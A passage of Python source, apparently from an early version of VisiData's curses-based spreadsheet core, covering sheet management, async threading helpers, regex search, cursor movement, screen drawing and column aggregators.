floatchars = options.float_chars
if isinstance(s, str):
while s[0] not in floatchars:
s = s[1:]
while s[-1] not in floatchars:
s = s[:-1]
return float(s)
class date:
'`datetime` wrapper, constructing from time_t or from str with dateutil.parse'
def __init__(self, s=None):
if s is None:
self.dt = datetime.datetime.now()
elif isinstance(s, int) or isinstance(s, float):
self.dt = datetime.datetime.fromtimestamp(s)
elif isinstance(s, str):
import dateutil.parser
self.dt = dateutil.parser.parse(s)
else:
assert isinstance(s, datetime.datetime)
self.dt = s
def to_string(self, fmtstr=None):
'Convert datetime object to string, in ISO 8601 format by default.'
if not fmtstr:
fmtstr = '%Y-%m-%d %H:%M:%S'
return self.dt.strftime(fmtstr)
def __getattr__(self, k):
'Forward unknown attributes to inner datetime object'
return getattr(self.dt, k)
def __str__(self):
return self.to_string()
def __lt__(self, a):
return self.dt < a.dt
typemap = {
str: '~',
date: '@',
int: '#',
currency: '$',
float: '%',
anytype: ' ',
}
def joinSheetnames(*sheetnames):
'Concatenate sheet names using `options.sheetname_joiner`.'
return options.sheetname_joiner.join(str(x) for x in sheetnames)
def error(s):
'Return custom exception as function, for use with `lambda` and `eval`.'
raise Exception(s)
def status(*args):
'Return status property via function call.'
return vd().status(*args)
def moveListItem(L, fromidx, toidx):
"Move element within list `L` and return element's new index."
r = L.pop(fromidx)
L.insert(toidx, r)
return toidx
def enumPivot(L, pivotIdx):
'''Model Python `enumerate()` but starting midway through sequence `L`.
Begin at index following `pivotIdx`, traverse through end.
At sequence-end, begin at sequence-head, continuing through `pivotIdx`.'''
rng = range(pivotIdx + 1, len(L))
rng2 = range(0, pivotIdx + 1)
for i in itertools.chain(rng, rng2):
yield i, L[i]
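# Illustrative example (not in the original source) of enumPivot's wrap-around order:
#   list(enumPivot('abcde', 2))  # -> [(3, 'd'), (4, 'e'), (0, 'a'), (1, 'b'), (2, 'c')]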
# VisiData singleton contains all sheets
@functools.lru_cache()
def vd():
'''Instantiate and return singleton instance of VisiData class.
    Contains all sheets, and (as a singleton) is the unique instance.'''
return VisiData()
def exceptionCaught(status=True):
return vd().exceptionCaught(status)
def chooseOne(choices):
'''Return `input` statement choices formatted with `/` as separator.
Choices can be list/tuple or dict (if dict, its keys will be used).'''
if isinstance(choices, dict):
return choices[input('/'.join(choices.keys()) + ': ')]
else:
return input('/'.join(str(x) for x in choices) + ': ')
def regex_flags():
'Return flags to pass to regex functions from options'
return sum(getattr(re, f.upper()) for f in options.regex_flags)
def sync():
'Wait for all async threads to finish.'
while len(vd().unfinishedThreads) > 0:
vd().checkForFinishedThreads()
def async(func):
'Function decorator, to make calls to `func()` spawn a separate thread if available.'
def _execAsync(*args, **kwargs):
return vd().execAsync(func, *args, **kwargs)
return _execAsync
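# Illustrative sketch (not part of the original file): any long-running function can be
# wrapped with @async so it runs in its own daemon thread while the UI keeps drawing;
# pairing it with Sheet.genProgress feeds the progress percentage shown in the status bar.
# (Requires a running VisiData with at least one sheet on the stack.)
#
#   @async
#   def slow_count(sheet):
#       total = 0
#       for r in sheet.genProgress(sheet.rows):
#           total += 1
#       status('counted %d rows' % total)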
class VisiData:
allPrefixes = 'gz' # 'g'lobal, 'z'scroll
def __init__(self):
self.sheets = []
self.statuses = [] # statuses shown until next action
self.lastErrors = []
self.searchContext = {}
self.statusHistory = []
self.lastInputs = collections.defaultdict(collections.OrderedDict) # [input_type] -> prevInputs
self.keystrokes = ''
self.inInput = False
self.scr = None # curses scr
self.hooks = {}
self.threads = [] # all threads, including finished
def status(self, *args):
'Add status message to be shown until next action.'
s = '; '.join(str(x) for x in args)
self.statuses.append(s)
self.statusHistory.insert(0, s)
return s
def addHook(self, hookname, hookfunc):
'Add hookfunc by hookname, to be called by corresponding `callHook`.'
if hookname in self.hooks:
hooklist = self.hooks[hookname]
else:
hooklist = []
self.hooks[hookname] = hooklist
hooklist.append(hookfunc)
def callHook(self, hookname, *args, **kwargs):
'Call all functions registered with `addHook` for the given hookname.'
r = None
for f in self.hooks.get(hookname, []):
r = r or f(*args, **kwargs)
return r
def execAsync(self, func, *args, **kwargs):
'Execute `func(*args, **kwargs)`, possibly in a separate thread.'
if threading.current_thread().daemon:
# Don't spawn a new thread from a subthread.
return func(*args, **kwargs)
currentSheet = self.sheets[0]
if currentSheet.currentThread:
confirm('replace task %s already in progress? ' % currentSheet.currentThread.name)
thread = threading.Thread(target=self.toplevelTryFunc, daemon=True, args=(func,) + args, kwargs=kwargs)
self.threads.append(thread)
currentSheet.currentThread = thread
thread.sheet = currentSheet
thread.start()
return thread
def toplevelTryFunc(self, func, *args, **kwargs):
'Thread entry-point for `func(*args, **kwargs)` with try/except wrapper'
t = threading.current_thread()
t.name = func.__name__
t.startTime = time.process_time()
t.endTime = None
t.status = ''
ret = None
try:
ret = func(*args, **kwargs)
except EscapeException as e: # user aborted
t.status += 'aborted by user'
self.status('%s aborted' % t.name)
except Exception as e:
t.status += self.status('%s: %s' % (type(e).__name__, ' '.join(str(x) for x in e.args)))
exceptionCaught()
t.sheet.currentThread = None
t.sheet.progressMade = t.sheet.progressTotal
return ret
@property
def unfinishedThreads(self):
'A list of unfinished threads (those without a recorded `endTime`).'
return [t for t in self.threads if t.endTime is None]
def checkForFinishedThreads(self):
'Mark terminated threads with endTime.'
for t in self.unfinishedThreads:
if not t.is_alive():
t.endTime = time.process_time()
t.status += 'ended'
def editText(self, y, x, w, **kwargs):
'Wrap global editText with `preedit` and `postedit` hooks.'
v = self.callHook('preedit')
if v is not None:
return v
cursorEnable(True)
v = editText(self.scr, y, x, w, **kwargs)
cursorEnable(False)
if kwargs.get('display', True):
self.status('"%s"' % v)
self.callHook('postedit', v)
return v
def getkeystroke(self, scr, vs=None):
'Get keystroke and display it on status bar.'
k = None
try:
k = scr.get_wch()
self.drawRightStatus(scr, vs or self.sheets[0]) # continue to display progress %
except Exception:
return '' # curses timeout
if isinstance(k, str):
if ord(k) >= 32 and ord(k) != 127: # 127 == DEL or ^?
return k
k = ord(k)
return curses.keyname(k).decode('utf-8')
# kwargs: regex=None, columns=None, backward=False
def searchRegex(self, sheet, moveCursor=False, reverse=False, **kwargs):
'Set row index if moveCursor, otherwise return list of row indexes.'
def findMatchingColumn(sheet, row, columns, func):
for c in columns:
if func(c.getDisplayValue(row)):
return c
self.searchContext.update(kwargs)
regex = kwargs.get("regex")
if regex:
self.searchContext["regex"] = re.compile(regex, regex_flags()) or error('invalid regex: %s' % regex)
regex = self.searchContext.get("regex") or error("no regex")
columns = self.searchContext.get("columns")
if columns == "cursorCol":
columns = [sheet.cursorCol]
elif columns == "visibleCols":
columns = tuple(sheet.visibleCols)
elif isinstance(columns, Column):
columns = [columns]
if not columns:
error('bad columns')
searchBackward = self.searchContext.get("backward")
if reverse:
searchBackward = not searchBackward
if searchBackward:
rng = range(sheet.cursorRowIndex - 1, -1, -1)
rng2 = range(sheet.nRows - 1, sheet.cursorRowIndex - 1, -1)
else:
rng = range(sheet.cursorRowIndex + 1, sheet.nRows)
rng2 = range(0, sheet.cursorRowIndex + 1)
matchingRowIndexes = 0
sheet.progressTotal = sheet.nRows
sheet.progressMade = 0
for r in itertools.chain(rng, rng2):
sheet.progressMade += 1
c = findMatchingColumn(sheet, sheet.rows[r], columns, regex.search)
if c:
if moveCursor:
sheet.cursorRowIndex = r
sheet.cursorVisibleColIndex = sheet.visibleCols.index(c)
if r in rng2:
status('search wrapped')
return
else:
matchingRowIndexes += 1
yield r
status('%s matches for /%s/' % (matchingRowIndexes, regex.pattern))
def exceptionCaught(self, status=True):
'Maintain list of most recent errors and return most recent one.'
import traceback
self.lastErrors.append(traceback.format_exc().strip())
self.lastErrors = self.lastErrors[-10:] # keep most recent
if status:
return self.status(self.lastErrors[-1].splitlines()[-1])
if options.debug:
raise Exception
def drawLeftStatus(self, scr, vs):
'Draw left side of status bar.'
try:
lstatus = self.leftStatus(vs)
attr = colors[options.color_status]
_clipdraw(scr, self.windowHeight - 1, 0, lstatus, attr, self.windowWidth)
except Exception as e:
self.exceptionCaught()
def drawRightStatus(self, scr, vs):
'Draw right side of status bar.'
try:
rstatus, attr = self.rightStatus(vs)
_clipdraw(scr, self.windowHeight - 1, self.windowWidth - len(rstatus) - 2, rstatus, attr, len(rstatus))
curses.doupdate()
except Exception as e:
self.exceptionCaught()
def leftStatus(self, vs):
'Compose left side of status bar and add status messages.'
s = vs.leftStatus()
s += options.disp_status_sep.join(self.statuses)
return s
def rightStatus(self, sheet):
'Compose right side of status bar.'
status = '%s %9d,%d' % (self.keystrokes, sheet.cursorRowIndex + 1, sheet.cursorVisibleColIndex + 1)
attr = colors[options.color_status]
return status, attr
@property
def windowHeight(self):
return self.scr.getmaxyx()[0] if self.scr else 25
@property
def windowWidth(self):
return self.scr.getmaxyx()[1] if self.scr else 80
def run(self, scr):
'Manage execution of keystrokes and subsequent redrawing of screen.'
global sheet
scr.timeout(int(options.curses_timeout))
cursorEnable(False)
self.scr = scr
self.keystrokes = ''
while True:
if not self.sheets:
# if no more sheets, exit
return
sheet = self.sheets[0]
try:
sheet.draw(scr)
except Exception as e:
self.exceptionCaught()
self.drawLeftStatus(scr, sheet)
self.drawRightStatus(scr, sheet) # visible during this getkeystroke
keystroke = self.getkeystroke(scr, sheet)
if keystroke:
if self.keystrokes not in self.allPrefixes:
self.keystrokes = ''
self.statuses = []
self.keystrokes += keystroke
self.drawRightStatus(scr, sheet) # visible for commands that wait for input
if not keystroke: # timeout instead of keypress
pass
elif keystroke == '^Q':
return self.lastErrors and self.lastErrors[-1]
elif keystroke == 'KEY_RESIZE':
pass
elif keystroke == 'KEY_MOUSE':
try:
devid, x, y, z, bstate = curses.getmouse()
sheet.cursorRowIndex = sheet.topRowIndex + y - 1
except curses.error:
pass
elif self.keystrokes in sheet.commands:
sheet.exec_command(globals(), sheet.commands[self.keystrokes])
elif keystroke in self.allPrefixes:
pass
else:
status('no command for "%s"' % (self.keystrokes))
self.checkForFinishedThreads()
self.callHook('predraw')
sheet.checkCursor()
def replace(self, vs):
'Replace top sheet with the given sheet `vs`.'
self.sheets.pop(0)
return self.push(vs)
def remove(self, vs):
if vs in self.sheets:
self.sheets.remove(vs)
else:
error('sheet not on stack')
def push(self, vs):
'Move given sheet `vs` to index 0 of list `sheets`.'
if vs:
vs.vd = self
if vs in self.sheets:
self.sheets.remove(vs)
self.sheets.insert(0, vs)
elif len(vs.rows) == 0: # first time
self.sheets.insert(0, vs)
vs.reload()
else:
self.sheets.insert(0, vs)
return vs
# end VisiData class
class LazyMap:
'A lazily evaluated mapping'
def __init__(self, keys, getter, setter):
self._keys = keys
self._getter = getter
self._setter = setter
def keys(self):
return self._keys
def __getitem__(self, k):
if k not in self._keys:
raise KeyError(k)
return self._getter(k)
def __setitem__(self, k, v):
self._keys.append(k)
self._setter(k, v)
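# Illustrative note (not part of the original file): LazyMap is what lets command
# execstrings refer to sheet attributes as bare names, resolving them only when read.
# Given some Sheet instance `sheet`:
#   lm = LazyMap(dir(sheet), lambda k: getattr(sheet, k), lambda k, v: setattr(sheet, k, v))
#   eval('cursorRowIndex + 1', {}, lm)   # getattr(sheet, 'cursorRowIndex') happens here, lazily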
class Sheet:
'Base object for add-on inheritance.'
def __init__(self, name, *sources, columns=None):
self.name = name
self.sources = list(sources)
self.rows = [] # list of opaque row objects
self.cursorRowIndex = 0 # absolute index of cursor into self.rows
self.cursorVisibleColIndex = 0 # index of cursor into self.visibleCols
self.topRowIndex = 0 # cursorRowIndex of topmost row
self.leftVisibleColIndex = 0 # cursorVisibleColIndex of leftmost column
self.rightVisibleColIndex = 0
self.loader = None
# as computed during draw()
self.rowLayout = {} # [rowidx] -> y
self.visibleColLayout = {} # [vcolidx] -> (x, w)
# all columns in display order
self.columns = columns or [] # list of Column objects
self.nKeys = 0 # self.columns[:nKeys] are all pinned to the left and matched on join
# commands specific to this sheet
self.commands = collections.ChainMap(collections.OrderedDict(), baseCommands)
self._selectedRows = {} # id(row) -> row
# for progress bar
self.progressMade = 0
self.progressTotal = 0
# only allow one async task per sheet
self.currentThread = None
self.colorizers = {'row': [], 'col': [], 'hdr': [], 'cell': []}
self.addColorizer('hdr', 0, lambda s, c, r, v: options.color_default_hdr)
self.addColorizer('hdr', 9, lambda s, c, r, v: options.color_current_hdr if c is s.cursorCol else None)
self.addColorizer('hdr', 8, lambda s, c, r, v: options.color_key_col if c in s.keyCols else None)
self.addColorizer('col', 5, lambda s, c, r, v: options.color_current_col if c is s.cursorCol else None)
self.addColorizer('col', 7, lambda s, c, r, v: options.color_key_col if c in s.keyCols else None)
self.addColorizer('cell', 2, lambda s, c, r, v: options.color_default)
self.addColorizer('row', 8, lambda s, c, r, v: options.color_selected_row if s.isSelected(r) else None)
self.addColorizer('row', 10, lambda s, c, r, v: options.color_current_row if r is s.cursorRow else None)
def addColorizer(self, colorizerType, precedence, colorfunc):
self.colorizers[colorizerType].append((precedence, colorfunc))
def colorizeRow(self, row):
return self.colorize(['row'], None, row)
def colorizeColumn(self, col):
return self.colorize(['col'], col, None)
def colorizeHdr(self, col):
return self.colorize(['hdr'], col, None)
def colorizeCell(self, col, row, value):
return self.colorize(['col', 'row', 'cell'], col, row, value)
def colorize(self, colorizerTypes, col, row, value=None):
'Returns curses attribute for the given col/row/value'
attr = 0
attrpre = 0
for colorizerType in colorizerTypes:
for precedence, func in sorted(self.colorizers[colorizerType], key=lambda x: x[0]):
color = func(self, col, row, value)
if color:
attr, attrpre = colors.update(attr, attrpre, color, precedence)
return attr
def leftStatus(self):
'Compose left side of status bar for this sheet (overridable).'
return options.disp_status_fmt.format(sheet=self)
def genProgress(self, L, total=None):
        'Generate the items of iterable `L`, updating progressMade/progressTotal as they are consumed.'
self.progressTotal = total or len(L)
self.progressMade = 0
for i in L:
self.progressMade += 1
yield i
self.progressMade = self.progressTotal
def command(self, keystrokes, execstr, helpstr):
'Populate command, help-string and execution string for keystrokes.'
if isinstance(keystrokes, str):
keystrokes = [keystrokes]
for ks in keystrokes:
self.commands[ks] = (ks, helpstr, execstr)
def moveRegex(self, *args, **kwargs):
'Wrap `VisiData.searchRegex`, with cursor additionally moved.'
list(self.searchRegex(*args, moveCursor=True, **kwargs))
def searchRegex(self, *args, **kwargs):
'Wrap `VisiData.searchRegex`.'
return self.vd.searchRegex(self, *args, **kwargs)
def searchColumnNameRegex(self, colregex):
'Select visible column matching `colregex`, if found.'
for i, c in enumPivot(self.visibleCols, self.cursorVisibleColIndex):
if re.search(colregex, c.name, regex_flags()):
self.cursorVisibleColIndex = i
return
def recalc(self):
for c in self.columns:
if c._cachedValues:
c._cachedValues.clear()
def reload(self):
'Default reloader, wrapping `loader` member function.'
if self.loader:
self.loader()
else:
status('no reloader')
def copy(self, suffix="'"):
'''Return copy of this sheet, with `suffix` appended to `name`, and a deepcopy of `columns`,
so their display attributes (width, etc) may be adjusted independently.'''
c = copy.copy(self)
c.name += suffix
c.topRowIndex = c.cursorRowIndex = 0
c.columns = copy.deepcopy(self.columns)
c._selectedRows = self._selectedRows.copy()
c.colorizers = self.colorizers.copy()
return c
@async
def deleteSelected(self):
'Delete all selected rows.'
oldrows = self.rows
oldidx = self.cursorRowIndex
ndeleted = 0
row = None # row to re-place cursor after
while oldidx < len(oldrows):
if not self.isSelected(oldrows[oldidx]):
row = self.rows[oldidx]
break
oldidx += 1
self.rows = []
for r in self.genProgress(oldrows):
if not self.isSelected(r):
self.rows.append(r)
if r is row:
self.cursorRowIndex = len(self.rows) - 1
else:
ndeleted += 1
nselected = len(self._selectedRows)
self._selectedRows.clear()
status('deleted %s rows' % ndeleted)
if ndeleted != nselected:
error('expected %s' % nselected)
def __repr__(self):
return self.name
def exec_command(self, vdglobals, cmd):
'Wrap execution of `cmd`, adding globals and `locs` dictionary.'
escaped = False
if vdglobals is None:
vdglobals = globals()
# handy globals for use by commands
keystrokes, _, execstr = cmd
self.sheet = self
locs = LazyMap(dir(self),
lambda k, s=self: getattr(s, k),
lambda k, v, s=self: setattr(s, k, v)
)
self.vd.callHook('preexec', self, keystrokes)
try:
exec(execstr, vdglobals, locs)
except EscapeException as e: # user aborted
self.vd.status(e.args[0])
escaped = True
except Exception:
self.vd.exceptionCaught()
self.vd.callHook('postexec', self.vd.sheets[0] if self.vd.sheets else None, escaped)
return escaped
@property
def name(self):
'Wrap return of `_name`.'
return self._name
@name.setter
def name(self, name):
'Wrap setting of `_name`.'
self._name = name.replace(' ', '_')
@property
def source(self):
'Return first source, if any.'
if not self.sources:
return None
else:
# assert len(self.sources) == 1, len(self.sources)
return self.sources[0]
@property
def progressPct(self):
'Return percentage of rows completed.'
if self.progressTotal != 0:
return int(self.progressMade * 100 / self.progressTotal)
@property
def nVisibleRows(self):
'Return number of visible rows, calculable from window height.'
return self.vd.windowHeight - 2
@property
def cursorCol(self):
'Return current Column object.'
return self.visibleCols[self.cursorVisibleColIndex]
@property
def cursorRow(self):
'Return current row.'
return self.rows[self.cursorRowIndex]
@property
def visibleRows(self): # onscreen rows
'Return a list of rows currently visible onscreen.'
return self.rows[self.topRowIndex:self.topRowIndex + self.nVisibleRows]
@property
def visibleCols(self): # non-hidden cols
'Return a list of unhidden Column objects.'
return [c for c in self.columns if not c.hidden]
@property
def visibleColNames(self):
'Return string of visible column-names.'
return ' '.join(c.name for c in self.visibleCols)
@property
def cursorColIndex(self):
'Return index of current column into Sheet.columns.'
return self.columns.index(self.cursorCol)
@property
def keyCols(self):
'Return list of key columns.'
return self.columns[:self.nKeys]
@property
def nonKeyVisibleCols(self):
'Return list of unhidden non-key columns.'
return [c for c in self.columns[self.nKeys:] if not c.hidden]
@property
def keyColNames(self):
'Return string of key column names.'
return options.disp_key_sep.join(c.name for c in self.keyCols)
@property
def cursorValue(self):
'Return cell contents at current row and column.'
return self.cellValue(self.cursorRowIndex, self.cursorColIndex)
@property
def statusLine(self):
'Return status-line element showing row and column stats.'
rowinfo = 'row %d/%d (%d selected)' % (self.cursorRowIndex, self.nRows, len(self._selectedRows))
colinfo = 'col %d/%d (%d visible)' % (self.cursorColIndex, self.nCols, len(self.visibleCols))
return '%s %s' % (rowinfo, colinfo)
@property
def nRows(self):
'Return number of rows.'
return len(self.rows)
@property
def nCols(self):
'Return number of columns.'
return len(self.columns)
@property
def nVisibleCols(self):
'Return number of visible columns.'
return len(self.visibleCols)
## selection code
def isSelected(self, r):
'Return boolean: is current row selected?'
return id(r) in self._selectedRows
@async
def toggle(self, rows):
'Select any unselected rows.'
for r in self.genProgress(rows, len(self.rows)):
if not self.unselectRow(r):
self.selectRow(r)
def selectRow(self, row):
'Select given row.'
self._selectedRows[id(row)] = row
def unselectRow(self, row):
'Unselect given row, return True if selected; else return False.'
if id(row) in self._selectedRows:
del self._selectedRows[id(row)]
return True
else:
return False
@async
def select(self, rows, status=True, progress=True):
'Select given rows with option for progress-tracking.'
before = len(self._selectedRows)
for r in (self.genProgress(rows) if progress else rows):
self.selectRow(r)
if status:
self.vd.status('selected %s%s rows' % (len(self._selectedRows) - before, ' more' if before > 0 else ''))
@async
def unselect(self, rows, status=True, progress=True):
'Unselect given rows with option for progress-tracking.'
before = len(self._selectedRows)
for r in (self.genProgress(rows) if progress else rows):
self.unselectRow(r)
if status:
self.vd.status('unselected %s/%s rows' % (before - len(self._selectedRows), before))
def selectByIdx(self, rowIdxs):
'Select given rows by index numbers.'
self.select((self.rows[i] for i in rowIdxs), progress=False)
def unselectByIdx(self, rowIdxs):
'Unselect given rows by index numbers.'
self.unselect((self.rows[i] for i in rowIdxs), progress=False)
def gatherBy(self, func):
        'Yield each row r for which func(r) is true, tracking progress.'
for r in self.genProgress(self.rows):
if func(r):
yield r
@property
def selectedRows(self):
'Return a list of selected rows in sheet order.'
return [r for r in self.rows if id(r) in self._selectedRows]
## end selection code
def moveVisibleCol(self, fromVisColIdx, toVisColIdx):
'Move column to another position in sheet.'
fromColIdx = self.columns.index(self.visibleCols[fromVisColIdx])
toColIdx = self.columns.index(self.visibleCols[toVisColIdx])
moveListItem(self.columns, fromColIdx, toColIdx)
return toVisColIdx
def cursorDown(self, n):
"Increment cursor's row by `n`."
self.cursorRowIndex += n
def cursorRight(self, n):
"Increment cursor's column by `n`."
self.cursorVisibleColIndex += n
self.calcColLayout()
def pageLeft(self):
'''Redraw page one screen to the left.
Note: keep the column cursor in the same general relative position:
- if it is on the furthest right column, then it should stay on the
furthest right column if possible
- likewise on the left or in the middle
So really both the `leftIndex` and the `cursorIndex` should move in
tandem until things are correct.'''
targetIdx = self.leftVisibleColIndex # for rightmost column
firstNonKeyVisibleColIndex = self.visibleCols.index(self.nonKeyVisibleCols[0])
while self.rightVisibleColIndex != targetIdx and self.leftVisibleColIndex > firstNonKeyVisibleColIndex:
self.cursorVisibleColIndex -= 1
self.leftVisibleColIndex -= 1
self.calcColLayout() # recompute rightVisibleColIndex
# in case that rightmost column is last column, try to squeeze maximum real estate from screen
if self.rightVisibleColIndex == self.nVisibleCols - 1:
# try to move further left while right column is still full width
while self.leftVisibleColIndex > 0:
rightcol = self.visibleCols[self.rightVisibleColIndex]
if rightcol.width > self.visibleColLayout[self.rightVisibleColIndex][1]:
# went too far
self.cursorVisibleColIndex += 1
self.leftVisibleColIndex += 1
break
else:
self.cursorVisibleColIndex -= 1
self.leftVisibleColIndex -= 1
self.calcColLayout() # recompute rightVisibleColIndex
def cellValue(self, rownum, col):
'Return cell value for given row number and Column object.'
if not isinstance(col, Column):
# assume it's the column number
col = self.columns[col]
return col.getValue(self.rows[rownum])
def addColumn(self, col, index=None):
'Insert column before current column or at given index.'
if index is None:
index = len(self.columns)
if col:
self.columns.insert(index, col)
def toggleKeyColumn(self, colidx):
'Toggle column at given index as key column.'
if colidx >= self.nKeys: # if not a key, add it
moveListItem(self.columns, colidx, self.nKeys)
self.nKeys += 1
return 1
else: # otherwise move it after the last key
self.nKeys -= 1
moveListItem(self.columns, colidx, self.nKeys)
return 0
def moveToNextRow(self, func, reverse=False):
'Move cursor to next (prev if reverse) row for which func returns True. Returns False if no row meets the criteria.'
rng = range(self.cursorRowIndex - 1, -1, -1) if reverse else range(self.cursorRowIndex + 1, self.nRows)
for i in rng:
if func(self.rows[i]):
self.cursorRowIndex = i
return True
return False
def checkCursor(self):
'Keep cursor in bounds of data and screen.'
# keep cursor within actual available rowset
if self.nRows == 0 or self.cursorRowIndex <= 0:
self.cursorRowIndex = 0
elif self.cursorRowIndex >= self.nRows:
self.cursorRowIndex = self.nRows - 1
if self.cursorVisibleColIndex <= 0:
self.cursorVisibleColIndex = 0
elif self.cursorVisibleColIndex >= self.nVisibleCols:
self.cursorVisibleColIndex = self.nVisibleCols - 1
if self.topRowIndex <= 0:
self.topRowIndex = 0
elif self.topRowIndex > self.nRows - self.nVisibleRows:
self.topRowIndex = self.nRows - self.nVisibleRows
# (x,y) is relative cell within screen viewport
x = self.cursorVisibleColIndex - self.leftVisibleColIndex
y = self.cursorRowIndex - self.topRowIndex + 1 # header
# check bounds, scroll if necessary
if y < 1:
self.topRowIndex = self.cursorRowIndex
elif y > self.nVisibleRows:
self.topRowIndex = self.cursorRowIndex - self.nVisibleRows + 1
if x <= 0:
self.leftVisibleColIndex = self.cursorVisibleColIndex
else:
while True:
if self.leftVisibleColIndex == self.cursorVisibleColIndex: # not much more we can do
break
self.calcColLayout()
if self.cursorVisibleColIndex < min(self.visibleColLayout.keys()):
self.leftVisibleColIndex -= 1
continue
elif self.cursorVisibleColIndex > max(self.visibleColLayout.keys()):
self.leftVisibleColIndex += 1
continue
cur_x, cur_w = self.visibleColLayout[self.cursorVisibleColIndex]
if cur_x + cur_w < self.vd.windowWidth: # current columns fit entirely on screen
break
self.leftVisibleColIndex += 1
def calcColLayout(self):
        'Lay out visible columns: compute their x offsets and widths, and set rightVisibleColIndex.'
self.visibleColLayout = {}
x = 0
vcolidx = 0
for vcolidx in range(0, self.nVisibleCols):
col = self.visibleCols[vcolidx]
if col.width is None and self.visibleRows:
col.width = col.getMaxWidth(self.visibleRows) + len(options.disp_more_left) + len(
options.disp_more_right)
width = col.width if col.width is not None else col.getMaxWidth(
self.visibleRows) # handle delayed column width-finding
if col in self.keyCols or vcolidx >= self.leftVisibleColIndex: # visible columns
self.visibleColLayout[vcolidx] = [x, min(width, self.vd.windowWidth - x)]
x += width + len(options.disp_column_sep)
if x > self.vd.windowWidth - 1:
break
self.rightVisibleColIndex = vcolidx
def drawColHeader(self, scr, y, vcolidx):
'Compose and draw column header for given vcolidx.'
col = self.visibleCols[vcolidx]
# hdrattr highlights whole column header
# sepattr is for header separators and indicators
sepattr = colors[options.color_column_sep]
hdrattr = self.colorizeHdr(col)
C = options.disp_column_sep
if (self.keyCols and col is self.keyCols[-1]) or vcolidx == self.rightVisibleColIndex:
C = options.disp_keycol_sep
x, colwidth = self.visibleColLayout[vcolidx]
# ANameTC
T = typemap.get(col.type, '?')
N = ' ' + (col.name or defaultColNames[vcolidx]) # save room at front for LeftMore
if len(N) > colwidth - 1:
N = N[:colwidth - len(options.disp_truncator)] + options.disp_truncator
_clipdraw(scr, y, x, N, hdrattr, colwidth)
_clipdraw(scr, y, x + colwidth - len(T), T, hdrattr, len(T))
if vcolidx == self.leftVisibleColIndex and col not in self.keyCols and self.nonKeyVisibleCols.index(col) > 0:
A = options.disp_more_left
scr.addstr(y, x, A, sepattr)
if C and x + colwidth + len(C) < self.vd.windowWidth:
scr.addstr(y, x + colwidth, C, sepattr)
def isVisibleIdxKey(self, vcolidx):
'Return boolean: is given column index a key column?'
return self.visibleCols[vcolidx] in self.keyCols
def draw(self, scr):
'Draw entire screen onto the `scr` curses object.'
numHeaderRows = 1
scr.erase() # clear screen before every re-draw
if not self.columns:
return
self.rowLayout = {}
self.calcColLayout()
for vcolidx, colinfo in sorted(self.visibleColLayout.items()):
x, colwidth = colinfo
col = self.visibleCols[vcolidx]
if x < self.vd.windowWidth: # only draw inside window
headerRow = 0
self.drawColHeader(scr, headerRow, vcolidx)
y = headerRow + numHeaderRows
for rowidx in range(0, self.nVisibleRows):
if self.topRowIndex + rowidx >= self.nRows:
break
self.rowLayout[self.topRowIndex + rowidx] = y
row = self.rows[self.topRowIndex + rowidx]
cellval = col.getDisplayValue(row, colwidth - 1)
attr = self.colorizeCell(col, row, cellval)
sepattr = self.colorizeRow(row) or colors[options.color_column_sep]
_clipdraw(scr, y, x, options.disp_column_fill + cellval, attr, colwidth)
annotation = ''
if isinstance(cellval, CalcErrorStr):
annotation = options.disp_getter_exc
notecolor = colors[options.color_getter_exc]
elif isinstance(cellval, WrongTypeStr):
annotation = options.disp_format_exc
notecolor = colors[options.color_format_exc]
if annotation:
_clipdraw(scr, y, x + colwidth - len(annotation), annotation, notecolor, len(annotation))
sepchars = options.disp_column_sep
if (self.keyCols and col is self.keyCols[-1]) or vcolidx == self.rightVisibleColIndex:
sepchars = options.disp_keycol_sep
if x + colwidth + len(sepchars) <= self.vd.windowWidth:
scr.addstr(y, x + colwidth, sepchars, sepattr)
y += 1
if vcolidx + 1 < self.nVisibleCols:
scr.addstr(headerRow, self.vd.windowWidth - 2, options.disp_more_right, colors[options.color_column_sep])
def editCell(self, vcolidx=None, rowidx=None):
'''Call `editText` on given cell after setting other parameters.
Return row after editing cell.'''
if options.readonly:
status('readonly mode')
return
if vcolidx is None:
vcolidx = self.cursorVisibleColIndex
x, w = self.visibleColLayout.get(vcolidx, (0, 0))
col = self.visibleCols[vcolidx]
if rowidx is None:
rowidx = self.cursorRowIndex
if rowidx < 0: # header
y = 0
currentValue = col.name
else:
y = self.rowLayout.get(rowidx, 0)
currentValue = self.cellValue(self.cursorRowIndex, col)
r = self.vd.editText(y, x, w, value=currentValue, fillchar=options.disp_edit_fill,
truncchar=options.disp_truncator)
if rowidx >= 0:
r = col.type(r) # convert input to column type
return r
class WrongTypeStr(str):
'Wrap `str` to indicate that type-conversion failed.'
pass
class CalcErrorStr(str):
'Wrap `str` (perhaps with error message), indicating `getValue` failed.'
pass
def distinct(values):
'Count unique elements in `values`.'
return len(set(values))
def avg(values):
return float(sum(values)) / len(values) if values else None
mean = avg
def count(values):
'Count total number of non-None elements.'
return len([x for x in values if x is not None])
_sum = sum
_max = max
_min = min
def sum(*values): return _sum(*values)
def max(*values): return _max(*values)
def min(*values): return _min(*values)
avg.type = float
count.type = int
distinct.type = int
sum.type = None
min.type = None
max.type = None
aggregators = {'': None,
'distinct': distinct,
'sum': sum,
'avg': avg,
'mean': avg,
'count': count, # (non-None)
'min': min,
'max': max
}
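# Illustrative usage (not part of the original file): an aggregator is attached to a
# Column and later applied to the list of grouped values for that column, e.g.:
#   col = Column('price', type=float)
#   col.aggregator = 'avg'          # the property setter also accepts the bare function name
#   col.aggregator([2.0, 4.0])      # -> 3.0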
class Column:
def __init__(self, name, type=anytype, getter=lambda r: r, setter=None, width=None, fmtstr=None, cache=False):
self.name = name # use property setter from the get-go to strip spaces
self.type = type # anytype/str/int/float/date/func
self.getter = getter # getter(r)
self.setter = setter # setter(r,v)
self.width = width # == 0 if hidden, None if auto-compute next time
self.expr = None # Python string expression if computed column
self.aggregator = None # function to use on the list of column values when grouping
self.fmtstr = fmtstr
self._cachedValues = collections.OrderedDict() if cache else None
def copy(self):
return copy.copy(self)
@property
def name(self):
return self._name
@name.setter
def name(self, name):
if options.force_valid_names:
name = ''.join(c for c in str(name) if
unicodedata.category(c) not in ('Cc', 'Zs', 'Zl')) # control char, space, line sep
self._name = name
####### cut; move global-getting into columnssheet
@property
def type(self):
return self._type
@type.setter
def type(self, t):
'Sets `_type` from t as either a typename or a callable. Revert to anytype if not callable.'
if isinstance(t, str):
t = globals()[t]
if t:
assert callable(t)
self._type = t
else:
self._type = anytype
@property
def aggregator(self):
return self._aggregator
@aggregator.setter
def aggregator(self, aggfunc):
